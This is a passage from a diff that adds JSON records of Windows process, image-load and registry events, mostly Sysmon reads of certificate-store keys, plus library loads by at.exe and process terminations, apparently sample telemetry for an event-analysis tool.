"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "schedcli.dll", + "image_path": "C:\\Windows\\System32\\schedcli.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + 
"timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "process", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "subtype": "terminate", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "process", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msv1_0.dll", + "image_path": "C:\\Windows\\System32\\msv1_0.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803860000, + "unique_pid": 
"{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NtlmShared.dll", + "image_path": "C:\\Windows\\System32\\NtlmShared.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
